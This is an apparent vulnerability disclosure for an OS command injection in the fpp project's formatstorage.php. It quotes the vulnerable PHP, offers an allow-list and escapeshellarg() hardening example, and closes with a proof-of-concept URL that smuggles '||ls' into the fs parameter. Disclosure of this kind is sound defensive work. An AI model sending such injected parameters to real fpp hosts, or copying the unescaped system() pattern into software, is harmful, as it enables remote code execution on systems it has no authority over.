OS Command Injection in falconchristmas/fpp
Reported on May 29th 2021
✍️ Description
Hi, it is possible to inject arbitrary OS commands in https://github.com/FalconChristmas/fpp/blob/59b7f7e8039a7019143c2c4b44f7d95b6358a4ef/www/formatstorage.php#L24
```php
<?php
echo "==================================================================================\n";
$command = "sudo /opt/fpp/scripts/format_storage.sh " . $_GET['fs'] . " " . $_GET['storageLocation'] . " 2>&1";
echo "Command: $command\n";
echo "----------------------------------------------------------------------------------\n";
system($command);
echo "\n";
?>
```
The variables $_GET['fs'] and $_GET['storageLocation'] aren't escaped or validated before being concatenated into the command string that is passed to system(), so shell metacharacters in either parameter are interpreted by the shell.
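One way the handler could be hardened, shown here as an added example that is not the project's own fix: validate both parameters against a strict allow-list and quote them with escapeshellarg() before building the command line. The accepted filesystem names and the device-name pattern are assumptions for illustration, not values taken from fpp.

```php
<?php
// Added hardening example (not the project's fix). The allow-list and the
// device-name pattern below are assumed placeholders for illustration.
const ALLOWED_FS = ['ext4', 'exfat', 'fat32'];   // assumed filesystem types
const STORAGE_PATTERN = '/^[a-z]+[0-9]*$/';      // assumed device-node form, e.g. sda1

// Returns the command to run, or null when either parameter is rejected.
function buildFormatCommand(string $fs, string $storageLocation): ?string
{
    if (!in_array($fs, ALLOWED_FS, true)) {
        return null;
    }
    if (preg_match(STORAGE_PATTERN, $storageLocation) !== 1) {
        return null;
    }
    // escapeshellarg() wraps each value in single quotes and escapes any
    // embedded quote, so metacharacters such as "||" stay literal data even
    // if a value somehow passes validation.
    return 'sudo /opt/fpp/scripts/format_storage.sh '
        . escapeshellarg($fs) . ' '
        . escapeshellarg($storageLocation) . ' 2>&1';
}

$command = buildFormatCommand($_GET['fs'] ?? '', $_GET['storageLocation'] ?? '');
if ($command === null) {
    http_response_code(400);
    echo "Invalid filesystem or storage location\n";
    exit;
}
echo "Command: $command\n";
system($command);
```

With these checks the request from the proof of concept below is rejected with a 400 before any command is built; the real allow-list should be derived from the values the surrounding UI actually offers.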
🕵️♂️ Proof of Concept
Visit http://127.0.0.1/formatstorage.php?fs=||ls
💥 Impact
Remote code execution (RCE) on the host running fpp.